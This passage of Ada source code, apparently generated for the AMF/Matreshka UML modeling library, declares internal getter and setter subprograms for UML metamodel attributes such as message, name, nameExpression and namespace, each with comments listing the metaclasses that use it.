ConsiderIgnoreFragment::message -- Interaction => Interaction::message function Internal_Get_Message (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Message (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- DestructionOccurrenceSpecification => MessageEnd::message -- Gate => MessageEnd::message -- MessageOccurrenceSpecification => MessageEnd::message function Internal_Get_Message_Kind (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Message_Kind; -- Message => Message::messageKind function Internal_Get_Message_Sort (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Message_Sort; procedure Internal_Set_Message_Sort (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Message_Sort); -- Message => Message::messageSort function Internal_Get_Metaclass (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; -- Extension => Extension::metaclass function Internal_Get_Metaclass_Reference (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Profile => Profile::metaclassReference function Internal_Get_Metamodel_Reference (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Profile => Profile::metamodelReference function Internal_Get_Method (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Operation => BehavioralFeature::method -- Reception => BehavioralFeature::method function Internal_Get_Min (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Min (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- DurationInterval => DurationInterval::min -- Interval => Interval::min -- TimeInterval => Interval::min function Internal_Get_Minint (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Minint (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- InteractionConstraint => InteractionConstraint::minint function Internal_Get_Mode (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Expansion_Kind; procedure Internal_Set_Mode (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Expansion_Kind); -- ExpansionRegion => ExpansionRegion::mode function Internal_Get_Mode_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Mode_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- UMLNameLabel => UMLNameLabel::modeElement function Internal_Get_Model_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Model_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- UMLActivityDiagram => UMLActivityDiagram::modelElement -- UMLAssociationEndLabel => UMLAssociationEndLabel::modelElement -- UMLAssociationOrConnectorOrLinkShape => DiagramElement::modelElement -- UMLClassDiagram => DiagramElement::modelElement -- UMLClassifierShape => UMLClassifierShape::modelElement -- UMLCompartment => DiagramElement::modelElement -- UMLCompartmentableShape => DiagramElement::modelElement -- UMLComponentDiagram => DiagramElement::modelElement -- UMLCompositeStructureDiagram => DiagramElement::modelElement -- UMLDeploymentDiagram => DiagramElement::modelElement -- UMLEdge => DiagramElement::modelElement -- UMLInteractionDiagram => UMLBehaviorDiagram::modelElement -- UMLInteractionTableLabel => DiagramElement::modelElement -- UMLKeywordLabel => DiagramElement::modelElement -- UMLLabel => DiagramElement::modelElement -- UMLMultiplicityLabel => UMLMultiplicityLabel::modelElement -- UMLNameLabel => DiagramElement::modelElement -- UMLObjectDiagram => DiagramElement::modelElement -- UMLPackageDiagram => DiagramElement::modelElement -- UMLProfileDiagram => DiagramElement::modelElement -- UMLRedefinesLabel => UMLRedefinesLabel::modelElement -- UMLShape => DiagramElement::modelElement -- UMLStateMachineDiagram => UMLBehaviorDiagram::modelElement -- UMLStateShape => DiagramElement::modelElement -- UMLStereotypePropertyValueLabel => UMLStereotypePropertyValueLabel::modelElement -- UMLTypedElementLabel => DiagramElement::modelElement -- UMLUseCaseDiagram => UMLBehaviorDiagram::modelElement function Internal_Get_Model_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- UMLActivityDiagram => UMLDiagramElement::modelElement -- UMLAssociationEndLabel => UMLDiagramElement::modelElement -- UMLAssociationOrConnectorOrLinkShape => UMLDiagramElement::modelElement -- UMLClassDiagram => UMLDiagramElement::modelElement -- UMLClassifierShape => UMLDiagramElement::modelElement -- UMLCompartment => UMLDiagramElement::modelElement -- UMLCompartmentableShape => UMLDiagramElement::modelElement -- UMLComponentDiagram => UMLDiagramElement::modelElement -- UMLCompositeStructureDiagram => UMLDiagramElement::modelElement -- UMLDeploymentDiagram => UMLDiagramElement::modelElement -- UMLEdge => UMLDiagramElement::modelElement -- UMLInteractionDiagram => UMLDiagramElement::modelElement -- UMLInteractionTableLabel => UMLDiagramElement::modelElement -- UMLKeywordLabel => UMLDiagramElement::modelElement -- UMLLabel => UMLDiagramElement::modelElement -- UMLMultiplicityLabel => UMLDiagramElement::modelElement -- UMLNameLabel => UMLDiagramElement::modelElement -- UMLObjectDiagram => UMLDiagramElement::modelElement -- UMLPackageDiagram => UMLDiagramElement::modelElement -- UMLProfileDiagram => UMLDiagramElement::modelElement -- UMLRedefinesLabel => UMLDiagramElement::modelElement -- UMLShape => UMLDiagramElement::modelElement -- UMLStateMachineDiagram => UMLDiagramElement::modelElement -- UMLStateShape => UMLDiagramElement::modelElement -- UMLStereotypePropertyValueLabel => UMLDiagramElement::modelElement -- UMLTypedElementLabel => UMLDiagramElement::modelElement -- UMLUseCaseDiagram => UMLDiagramElement::modelElement function Internal_Get_Must_Isolate (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Must_Isolate (Self : AMF.Internals.AMF_Element; To : Boolean); -- ConditionalNode => StructuredActivityNode::mustIsolate -- ExpansionRegion => StructuredActivityNode::mustIsolate -- LoopNode => StructuredActivityNode::mustIsolate -- SequenceNode => StructuredActivityNode::mustIsolate -- StructuredActivityNode => StructuredActivityNode::mustIsolate function Internal_Get_Name (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Name (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Abstraction => NamedElement::name -- AcceptCallAction => NamedElement::name -- AcceptEventAction => NamedElement::name -- ActionExecutionSpecification => NamedElement::name -- ActionInputPin => NamedElement::name -- Activity => NamedElement::name -- ActivityFinalNode => NamedElement::name -- ActivityParameterNode => NamedElement::name -- ActivityPartition => NamedElement::name -- Actor => NamedElement::name -- AddStructuralFeatureValueAction => NamedElement::name -- AddVariableValueAction => NamedElement::name -- AnyReceiveEvent => NamedElement::name -- Artifact => NamedElement::name -- Association => NamedElement::name -- AssociationClass => NamedElement::name -- BehaviorExecutionSpecification => NamedElement::name -- BroadcastSignalAction => NamedElement::name -- CallBehaviorAction => NamedElement::name -- CallEvent => NamedElement::name -- CallOperationAction => NamedElement::name -- CentralBufferNode => NamedElement::name -- ChangeEvent => NamedElement::name -- Class => NamedElement::name -- ClearAssociationAction => NamedElement::name -- ClearStructuralFeatureAction => NamedElement::name -- ClearVariableAction => NamedElement::name -- Collaboration => NamedElement::name -- CollaborationUse => NamedElement::name -- CombinedFragment => NamedElement::name -- CommunicationPath => NamedElement::name -- Component => NamedElement::name -- ComponentRealization => NamedElement::name -- ConditionalNode => NamedElement::name -- ConnectionPointReference => NamedElement::name -- Connector => NamedElement::name -- ConsiderIgnoreFragment => NamedElement::name -- Constraint => NamedElement::name -- Continuation => NamedElement::name -- ControlFlow => NamedElement::name -- CreateLinkAction => NamedElement::name -- CreateLinkObjectAction => NamedElement::name -- CreateObjectAction => NamedElement::name -- UMLActivityDiagram => NamedElement::name -- UMLClassDiagram => NamedElement::name -- UMLComponentDiagram => NamedElement::name -- UMLCompositeStructureDiagram => NamedElement::name -- UMLDeploymentDiagram => NamedElement::name -- UMLInteractionDiagram => NamedElement::name -- UMLObjectDiagram => NamedElement::name -- UMLPackageDiagram => NamedElement::name -- UMLProfileDiagram => NamedElement::name -- UMLStateMachineDiagram => NamedElement::name -- UMLStyle => NamedElement::name -- UMLUseCaseDiagram => NamedElement::name -- DataStoreNode => NamedElement::name -- DataType => NamedElement::name -- DecisionNode => NamedElement::name -- Dependency => NamedElement::name -- Deployment => NamedElement::name -- DeploymentSpecification => NamedElement::name -- DestroyLinkAction => NamedElement::name -- DestroyObjectAction => NamedElement::name -- DestructionOccurrenceSpecification => NamedElement::name -- Device => NamedElement::name -- Duration => NamedElement::name -- DurationConstraint => NamedElement::name -- DurationInterval => NamedElement::name -- DurationObservation => NamedElement::name -- Enumeration => NamedElement::name -- EnumerationLiteral => NamedElement::name -- ExecutionEnvironment => NamedElement::name -- ExecutionOccurrenceSpecification => NamedElement::name -- ExpansionNode => NamedElement::name -- ExpansionRegion => NamedElement::name -- Expression => NamedElement::name -- Extend => NamedElement::name -- Extension => NamedElement::name -- ExtensionEnd => NamedElement::name -- ExtensionPoint => NamedElement::name -- FinalState => NamedElement::name -- FlowFinalNode => NamedElement::name -- ForkNode => NamedElement::name -- FunctionBehavior => NamedElement::name -- Gate => NamedElement::name -- GeneralOrdering => NamedElement::name -- GeneralizationSet => NamedElement::name -- Include => NamedElement::name -- InformationFlow => NamedElement::name -- InformationItem => NamedElement::name -- InitialNode => NamedElement::name -- InputPin => NamedElement::name -- InstanceSpecification => NamedElement::name -- InstanceValue => NamedElement::name -- Interaction => NamedElement::name -- InteractionConstraint => NamedElement::name -- InteractionOperand => NamedElement::name -- InteractionUse => NamedElement::name -- Interface => NamedElement::name -- InterfaceRealization => NamedElement::name -- InterruptibleActivityRegion => NamedElement::name -- Interval => NamedElement::name -- IntervalConstraint => NamedElement::name -- JoinNode => NamedElement::name -- Lifeline => NamedElement::name -- LiteralBoolean => NamedElement::name -- LiteralInteger => NamedElement::name -- LiteralNull => NamedElement::name -- LiteralReal => NamedElement::name -- LiteralString => NamedElement::name -- LiteralUnlimitedNatural => NamedElement::name -- LoopNode => NamedElement::name -- Manifestation => NamedElement::name -- MergeNode => NamedElement::name -- Message => NamedElement::name -- MessageOccurrenceSpecification => NamedElement::name -- Model => NamedElement::name -- Node => NamedElement::name -- ObjectFlow => NamedElement::name -- OccurrenceSpecification => NamedElement::name -- OpaqueAction => NamedElement::name -- OpaqueBehavior => NamedElement::name -- OpaqueExpression => NamedElement::name -- Operation => NamedElement::name -- OutputPin => NamedElement::name -- Package => NamedElement::name -- Parameter => NamedElement::name -- ParameterSet => NamedElement::name -- PartDecomposition => NamedElement::name -- Port => NamedElement::name -- PrimitiveType => NamedElement::name -- Profile => NamedElement::name -- Property => NamedElement::name -- ProtocolStateMachine => NamedElement::name -- ProtocolTransition => NamedElement::name -- Pseudostate => NamedElement::name -- RaiseExceptionAction => NamedElement::name -- ReadExtentAction => NamedElement::name -- ReadIsClassifiedObjectAction => NamedElement::name -- ReadLinkAction => NamedElement::name -- ReadLinkObjectEndAction => NamedElement::name -- ReadLinkObjectEndQualifierAction => NamedElement::name -- ReadSelfAction => NamedElement::name -- ReadStructuralFeatureAction => NamedElement::name -- ReadVariableAction => NamedElement::name -- Realization => NamedElement::name -- Reception => NamedElement::name -- ReclassifyObjectAction => NamedElement::name -- RedefinableTemplateSignature => NamedElement::name -- ReduceAction => NamedElement::name -- Region => NamedElement::name -- RemoveStructuralFeatureValueAction => NamedElement::name -- RemoveVariableValueAction => NamedElement::name -- ReplyAction => NamedElement::name -- SendObjectAction => NamedElement::name -- SendSignalAction => NamedElement::name -- SequenceNode => NamedElement::name -- Signal => NamedElement::name -- SignalEvent => NamedElement::name -- StartClassifierBehaviorAction => NamedElement::name -- StartObjectBehaviorAction => NamedElement::name -- State => NamedElement::name -- StateInvariant => NamedElement::name -- StateMachine => NamedElement::name -- Stereotype => NamedElement::name -- StringExpression => NamedElement::name -- StructuredActivityNode => NamedElement::name -- Substitution => NamedElement::name -- TestIdentityAction => NamedElement::name -- TimeConstraint => NamedElement::name -- TimeEvent => NamedElement::name -- TimeExpression => NamedElement::name -- TimeInterval => NamedElement::name -- TimeObservation => NamedElement::name -- Transition => NamedElement::name -- Trigger => NamedElement::name -- UnmarshallAction => NamedElement::name -- Usage => NamedElement::name -- UseCase => NamedElement::name -- ValuePin => NamedElement::name -- ValueSpecificationAction => NamedElement::name -- Variable => NamedElement::name function Internal_Get_Name_Expression (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Name_Expression (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Abstraction => NamedElement::nameExpression -- AcceptCallAction => NamedElement::nameExpression -- AcceptEventAction => NamedElement::nameExpression -- ActionExecutionSpecification => NamedElement::nameExpression -- ActionInputPin => NamedElement::nameExpression -- Activity => NamedElement::nameExpression -- ActivityFinalNode => NamedElement::nameExpression -- ActivityParameterNode => NamedElement::nameExpression -- ActivityPartition => NamedElement::nameExpression -- Actor => NamedElement::nameExpression -- AddStructuralFeatureValueAction => NamedElement::nameExpression -- AddVariableValueAction => NamedElement::nameExpression -- AnyReceiveEvent => NamedElement::nameExpression -- Artifact => NamedElement::nameExpression -- Association => NamedElement::nameExpression -- AssociationClass => NamedElement::nameExpression -- BehaviorExecutionSpecification => NamedElement::nameExpression -- BroadcastSignalAction => NamedElement::nameExpression -- CallBehaviorAction => NamedElement::nameExpression -- CallEvent => NamedElement::nameExpression -- CallOperationAction => NamedElement::nameExpression -- CentralBufferNode => NamedElement::nameExpression -- ChangeEvent => NamedElement::nameExpression -- Class => NamedElement::nameExpression -- ClearAssociationAction => NamedElement::nameExpression -- ClearStructuralFeatureAction => NamedElement::nameExpression -- ClearVariableAction => NamedElement::nameExpression -- Collaboration => NamedElement::nameExpression -- CollaborationUse => NamedElement::nameExpression -- CombinedFragment => NamedElement::nameExpression -- CommunicationPath => NamedElement::nameExpression -- Component => NamedElement::nameExpression -- ComponentRealization => NamedElement::nameExpression -- ConditionalNode => NamedElement::nameExpression -- ConnectionPointReference => NamedElement::nameExpression -- Connector => NamedElement::nameExpression -- ConsiderIgnoreFragment => NamedElement::nameExpression -- Constraint => NamedElement::nameExpression -- Continuation => NamedElement::nameExpression -- ControlFlow => NamedElement::nameExpression -- CreateLinkAction => NamedElement::nameExpression -- CreateLinkObjectAction => NamedElement::nameExpression -- CreateObjectAction => NamedElement::nameExpression -- UMLActivityDiagram => NamedElement::nameExpression -- UMLClassDiagram => NamedElement::nameExpression -- UMLComponentDiagram => NamedElement::nameExpression -- UMLCompositeStructureDiagram => NamedElement::nameExpression -- UMLDeploymentDiagram => NamedElement::nameExpression -- UMLInteractionDiagram => NamedElement::nameExpression -- UMLObjectDiagram => NamedElement::nameExpression -- UMLPackageDiagram => NamedElement::nameExpression -- UMLProfileDiagram => NamedElement::nameExpression -- UMLStateMachineDiagram => NamedElement::nameExpression -- UMLStyle => NamedElement::nameExpression -- UMLUseCaseDiagram => NamedElement::nameExpression -- DataStoreNode => NamedElement::nameExpression -- DataType => NamedElement::nameExpression -- DecisionNode => NamedElement::nameExpression -- Dependency => NamedElement::nameExpression -- Deployment => NamedElement::nameExpression -- DeploymentSpecification => NamedElement::nameExpression -- DestroyLinkAction => NamedElement::nameExpression -- DestroyObjectAction => NamedElement::nameExpression -- DestructionOccurrenceSpecification => NamedElement::nameExpression -- Device => NamedElement::nameExpression -- Duration => NamedElement::nameExpression -- DurationConstraint => NamedElement::nameExpression -- DurationInterval => NamedElement::nameExpression -- DurationObservation => NamedElement::nameExpression -- Enumeration => NamedElement::nameExpression -- EnumerationLiteral => NamedElement::nameExpression -- ExecutionEnvironment => NamedElement::nameExpression -- ExecutionOccurrenceSpecification => NamedElement::nameExpression -- ExpansionNode => NamedElement::nameExpression -- ExpansionRegion => NamedElement::nameExpression -- Expression => NamedElement::nameExpression -- Extend => NamedElement::nameExpression -- Extension => NamedElement::nameExpression -- ExtensionEnd => NamedElement::nameExpression -- ExtensionPoint => NamedElement::nameExpression -- FinalState => NamedElement::nameExpression -- FlowFinalNode => NamedElement::nameExpression -- ForkNode => NamedElement::nameExpression -- FunctionBehavior => NamedElement::nameExpression -- Gate => NamedElement::nameExpression -- GeneralOrdering => NamedElement::nameExpression -- GeneralizationSet => NamedElement::nameExpression -- Include => NamedElement::nameExpression -- InformationFlow => NamedElement::nameExpression -- InformationItem => NamedElement::nameExpression -- InitialNode => NamedElement::nameExpression -- InputPin => NamedElement::nameExpression -- InstanceSpecification => NamedElement::nameExpression -- InstanceValue => NamedElement::nameExpression -- Interaction => NamedElement::nameExpression -- InteractionConstraint => NamedElement::nameExpression -- InteractionOperand => NamedElement::nameExpression -- InteractionUse => NamedElement::nameExpression -- Interface => NamedElement::nameExpression -- InterfaceRealization => NamedElement::nameExpression -- InterruptibleActivityRegion => NamedElement::nameExpression -- Interval => NamedElement::nameExpression -- IntervalConstraint => NamedElement::nameExpression -- JoinNode => NamedElement::nameExpression -- Lifeline => NamedElement::nameExpression -- LiteralBoolean => NamedElement::nameExpression -- LiteralInteger => NamedElement::nameExpression -- LiteralNull => NamedElement::nameExpression -- LiteralReal => NamedElement::nameExpression -- LiteralString => NamedElement::nameExpression -- LiteralUnlimitedNatural => NamedElement::nameExpression -- LoopNode => NamedElement::nameExpression -- Manifestation => NamedElement::nameExpression -- MergeNode => NamedElement::nameExpression -- Message => NamedElement::nameExpression -- MessageOccurrenceSpecification => NamedElement::nameExpression -- Model => NamedElement::nameExpression -- Node => NamedElement::nameExpression -- ObjectFlow => NamedElement::nameExpression -- OccurrenceSpecification => NamedElement::nameExpression -- OpaqueAction => NamedElement::nameExpression -- OpaqueBehavior => NamedElement::nameExpression -- OpaqueExpression => NamedElement::nameExpression -- Operation => NamedElement::nameExpression -- OutputPin => NamedElement::nameExpression -- Package => NamedElement::nameExpression -- Parameter => NamedElement::nameExpression -- ParameterSet => NamedElement::nameExpression -- PartDecomposition => NamedElement::nameExpression -- Port => NamedElement::nameExpression -- PrimitiveType => NamedElement::nameExpression -- Profile => NamedElement::nameExpression -- Property => NamedElement::nameExpression -- ProtocolStateMachine => NamedElement::nameExpression -- ProtocolTransition => NamedElement::nameExpression -- Pseudostate => NamedElement::nameExpression -- RaiseExceptionAction => NamedElement::nameExpression -- ReadExtentAction => NamedElement::nameExpression -- ReadIsClassifiedObjectAction => NamedElement::nameExpression -- ReadLinkAction => NamedElement::nameExpression -- ReadLinkObjectEndAction => NamedElement::nameExpression -- ReadLinkObjectEndQualifierAction => NamedElement::nameExpression -- ReadSelfAction => NamedElement::nameExpression -- ReadStructuralFeatureAction => NamedElement::nameExpression -- ReadVariableAction => NamedElement::nameExpression -- Realization => NamedElement::nameExpression -- Reception => NamedElement::nameExpression -- ReclassifyObjectAction => NamedElement::nameExpression -- RedefinableTemplateSignature => NamedElement::nameExpression -- ReduceAction => NamedElement::nameExpression -- Region => NamedElement::nameExpression -- RemoveStructuralFeatureValueAction => NamedElement::nameExpression -- RemoveVariableValueAction => NamedElement::nameExpression -- ReplyAction => NamedElement::nameExpression -- SendObjectAction => NamedElement::nameExpression -- SendSignalAction => NamedElement::nameExpression -- SequenceNode => NamedElement::nameExpression -- Signal => NamedElement::nameExpression -- SignalEvent => NamedElement::nameExpression -- StartClassifierBehaviorAction => NamedElement::nameExpression -- StartObjectBehaviorAction => NamedElement::nameExpression -- State => NamedElement::nameExpression -- StateInvariant => NamedElement::nameExpression -- StateMachine => NamedElement::nameExpression -- Stereotype => NamedElement::nameExpression -- StringExpression => NamedElement::nameExpression -- StructuredActivityNode => NamedElement::nameExpression -- Substitution => NamedElement::nameExpression -- TestIdentityAction => NamedElement::nameExpression -- TimeConstraint => NamedElement::nameExpression -- TimeEvent => NamedElement::nameExpression -- TimeExpression => NamedElement::nameExpression -- TimeInterval => NamedElement::nameExpression -- TimeObservation => NamedElement::nameExpression -- Transition => NamedElement::nameExpression -- Trigger => NamedElement::nameExpression -- UnmarshallAction => NamedElement::nameExpression -- Usage => NamedElement::nameExpression -- UseCase => NamedElement::nameExpression -- ValuePin => NamedElement::nameExpression -- ValueSpecificationAction => NamedElement::nameExpression -- Variable => NamedElement::nameExpression function Internal_Get_Namespace (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; -- Abstraction => NamedElement::namespace -- AcceptCallAction => NamedElement::namespace -- AcceptEventAction => NamedElement::namespace -- ActionExecutionSpecification => NamedElement::namespace -- ActionInputPin => NamedElement::namespace -- Activity => NamedElement::namespace -- ActivityFinalNode => NamedElement::namespace -- ActivityParameterNode => NamedElement::namespace -- ActivityPartition => NamedElement::namespace -- Actor => NamedElement::namespace -- AddStructuralFeatureValueAction => NamedElement::namespace -- AddVariableValueAction => NamedElement::namespace -- AnyReceiveEvent => NamedElement::namespace -- Artifact => NamedElement::namespace -- Association => NamedElement::namespace -- AssociationClass => NamedElement::namespace -- BehaviorExecutionSpecification => NamedElement::namespace -- BroadcastSignalAction => NamedElement::namespace -- CallBehaviorAction => NamedElement::namespace -- CallEvent => NamedElement::namespace -- CallOperationAction => NamedElement::namespace -- CentralBufferNode => NamedElement::namespace -- ChangeEvent => NamedElement::namespace -- Class => NamedElement::namespace -- ClearAssociationAction => NamedElement::namespace -- ClearStructuralFeatureAction => NamedElement::namespace -- ClearVariableAction => NamedElement::namespace -- Collaboration => NamedElement::namespace -- CollaborationUse => NamedElement::namespace -- CombinedFragment => NamedElement::namespace -- CommunicationPath => NamedElement::namespace -- Component => NamedElement::namespace -- ComponentRealization => NamedElement::namespace -- ConditionalNode => NamedElement::namespace -- ConnectionPointReference => NamedElement::namespace -- Connector => NamedElement::namespace -- ConsiderIgnoreFragment => NamedElement::namespace -- Constraint => NamedElement::namespace -- Continuation => NamedElement::namespace -- ControlFlow => NamedElement::namespace -- CreateLinkAction => NamedElement::namespace -- CreateLinkObjectAction => NamedElement::namespace -- CreateObjectAction => NamedElement::namespace -- UMLActivityDiagram => NamedElement::namespace -- UMLClassDiagram => NamedElement::namespace -- UMLComponentDiagram => NamedElement::namespace -- UMLCompositeStructureDiagram => NamedElement::namespace -- UMLDeploymentDiagram => NamedElement::namespace -- UMLInteractionDiagram => NamedElement::namespace -- UMLObjectDiagram => NamedElement::namespace -- UMLPackageDiagram => NamedElement::namespace -- UMLProfileDiagram => NamedElement::namespace -- UMLStateMachineDiagram => NamedElement::namespace -- UMLStyle => NamedElement::namespace -- UMLUseCaseDiagram => NamedElement::namespace -- DataStoreNode => NamedElement::namespace -- DataType => NamedElement::namespace -- DecisionNode => NamedElement::namespace -- Dependency => NamedElement::namespace -- Deployment => NamedElement::namespace -- DeploymentSpecification => NamedElement::namespace -- DestroyLinkAction => NamedElement::namespace -- DestroyObjectAction => NamedElement::namespace -- DestructionOccurrenceSpecification => NamedElement::namespace -- Device => NamedElement::namespace -- Duration => NamedElement::namespace -- DurationConstraint => NamedElement::namespace -- DurationInterval => NamedElement::namespace -- DurationObservation => NamedElement::namespace -- Enumeration => NamedElement::namespace -- EnumerationLiteral => NamedElement::namespace -- ExecutionEnvironment => NamedElement::namespace -- ExecutionOccurrenceSpecification => NamedElement::namespace -- ExpansionNode => NamedElement::namespace -- ExpansionRegion => NamedElement::namespace -- Expression => NamedElement::namespace -- Extend => NamedElement::namespace -- Extension => NamedElement::namespace -- ExtensionEnd => NamedElement::namespace -- ExtensionPoint => NamedElement::namespace -- FinalState => NamedElement::namespace -- FlowFinalNode => NamedElement::namespace -- ForkNode => NamedElement::namespace -- FunctionBehavior => NamedElement::namespace -- Gate => NamedElement::namespace -- GeneralOrdering => NamedElement::namespace -- GeneralizationSet => NamedElement::namespace -- Include => NamedElement::namespace -- InformationFlow => NamedElement::namespace -- InformationItem => NamedElement::namespace -- InitialNode => NamedElement::namespace -- InputPin => NamedElement::namespace -- InstanceSpecification => NamedElement::namespace -- InstanceValue => NamedElement::namespace -- Interaction => NamedElement::namespace -- InteractionConstraint => NamedElement::namespace -- InteractionOperand => NamedElement::namespace -- InteractionUse => NamedElement::namespace -- Interface => NamedElement::namespace -- InterfaceRealization => NamedElement::namespace -- InterruptibleActivityRegion => NamedElement::namespace -- Interval => NamedElement::namespace -- IntervalConstraint => NamedElement::namespace -- JoinNode => NamedElement::namespace -- Lifeline => NamedElement::namespace -- LiteralBoolean => NamedElement::namespace -- LiteralInteger => NamedElement::namespace -- LiteralNull => NamedElement::namespace -- LiteralReal => NamedElement::namespace -- LiteralString => NamedElement::namespace -- LiteralUnlimitedNatural => NamedElement::namespace -- LoopNode => NamedElement::namespace -- Manifestation => NamedElement::namespace -- MergeNode => NamedElement::namespace -- Message => NamedElement::namespace -- MessageOccurrenceSpecification => NamedElement::namespace -- Model => NamedElement::namespace -- Node => NamedElement::namespace -- ObjectFlow => NamedElement::namespace -- OccurrenceSpecification => NamedElement::namespace -- OpaqueAction => NamedElement::namespace -- OpaqueBehavior => NamedElement::namespace -- OpaqueExpression => NamedElement::namespace -- Operation => NamedElement::namespace -- OutputPin => NamedElement::namespace -- Package => NamedElement::namespace -- Parameter => NamedElement::namespace -- ParameterSet => NamedElement::namespace -- PartDecomposition => NamedElement::namespace -- Port => NamedElement::namespace -- PrimitiveType => NamedElement::namespace -- Profile => NamedElement::namespace -- Property => NamedElement::namespace -- ProtocolStateMachine => NamedElement::namespace -- ProtocolTransition => NamedElement::namespace -- Pseudostate => NamedElement::namespace -- RaiseExceptionAction => NamedElement::namespace -- ReadExtentAction => NamedElement::namespace -- ReadIsClassifiedObjectAction => NamedElement::namespace -- ReadLinkAction => NamedElement::namespace -- ReadLinkObjectEndAction => NamedElement::namespace -- ReadLinkObjectEndQualifierAction => NamedElement::namespace -- ReadSelfAction => NamedElement::namespace -- ReadStructuralFeatureAction => NamedElement::namespace -- ReadVariableAction => NamedElement::namespace -- Realization => NamedElement::namespace -- Reception => NamedElement::namespace -- ReclassifyObjectAction => NamedElement::namespace -- RedefinableTemplateSignature => NamedElement::namespace -- ReduceAction => NamedElement::namespace -- Region => NamedElement::namespace -- RemoveStructuralFeatureValueAction => NamedElement::namespace -- RemoveVariableValueAction => NamedElement::namespace -- ReplyAction => NamedElement::namespace -- SendObjectAction => NamedElement::namespace -- SendSignalAction => NamedElement::namespace -- SequenceNode => NamedElement::namespace -- Signal => NamedElement::namespace -- SignalEvent => NamedElement::namespace -- StartClassifierBehaviorAction => NamedElement::namespace -- StartObjectBehaviorAction => NamedElement::namespace -- State => NamedElement::namespace -- StateInvariant => NamedElement::namespace -- StateMachine => NamedElement::namespace -- Stereotype => NamedElement::namespace -- StringExpression => NamedElement::namespace -- StructuredActivityNode => NamedElement::namespace -- Substitution => NamedElement::namespace -- TestIdentityAction => NamedElement::namespace -- TimeConstraint => NamedElement::namespace -- TimeEvent => NamedElement::namespace -- TimeExpression => NamedElement::namespace -- TimeInterval => NamedElement::namespace -- TimeObservation => NamedElement::namespace -- Transition => NamedElement::namespace -- Trigger => NamedElement::namespace -- UnmarshallAction => NamedElement::namespace -- Usage => NamedElement::namespace -- UseCase => NamedElement::namespace -- ValuePin => NamedElement::namespace -- ValueSpecificationAction => NamedElement::namespace -- Variable => NamedElement::namespace function Internal_Get_Navigability_Notation (Self : AMF.Internals.AMF_Element) return AMF.UMLDI.UMLDI_UML_Navigability_Notation_Kind; procedure Internal_Set_Navigability_Notation (Self : AMF.Internals.AMF_Element; To : AMF.UMLDI.UMLDI_UML_Navigability_Notation_Kind); -- UMLClassDiagram => UMLClassOrCompositeStructureDiagram::navigabilityNotation -- UMLCompositeStructureDiagram => UMLClassOrCompositeStructureDiagram::navigabilityNotation function Internal_Get_Navigable_Owned_End (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Association => Association::navigableOwnedEnd -- AssociationClass => Association::navigableOwnedEnd -- CommunicationPath => Association::navigableOwnedEnd -- Extension => Association::navigableOwnedEnd function Internal_Get_Nested_Artifact (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Artifact => Artifact::nestedArtifact -- DeploymentSpecification => Artifact::nestedArtifact function Internal_Get_Nested_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Class::nestedClassifier -- AssociationClass => Class::nestedClassifier -- Class => Class::nestedClassifier -- Component => Class::nestedClassifier -- Device => Class::nestedClassifier -- ExecutionEnvironment => Class::nestedClassifier -- FunctionBehavior => Class::nestedClassifier -- Interaction => Class::nestedClassifier -- Interface => Interface::nestedClassifier -- Node => Class::nestedClassifier -- OpaqueBehavior => Class::nestedClassifier -- ProtocolStateMachine => Class::nestedClassifier -- StateMachine => Class::nestedClassifier -- Stereotype => Class::nestedClassifier function Internal_Get_Nested_Node (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Device => Node::nestedNode -- ExecutionEnvironment => Node::nestedNode -- Node => Node::nestedNode function Internal_Get_Nested_Package (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Model => Package::nestedPackage -- Package => Package::nestedPackage -- Profile => Package::nestedPackage function Internal_Get_Nesting_Package (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Nesting_Package (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Model => Package::nestingPackage -- Package => Package::nestingPackage -- Profile => Package::nestingPackage function Internal_Get_New_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ReclassifyObjectAction => ReclassifyObjectAction::newClassifier function Internal_Get_Node (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Activity::node -- ActivityPartition => ActivityPartition::node -- ConditionalNode => StructuredActivityNode::node -- ExpansionRegion => StructuredActivityNode::node -- InterruptibleActivityRegion => InterruptibleActivityRegion::node 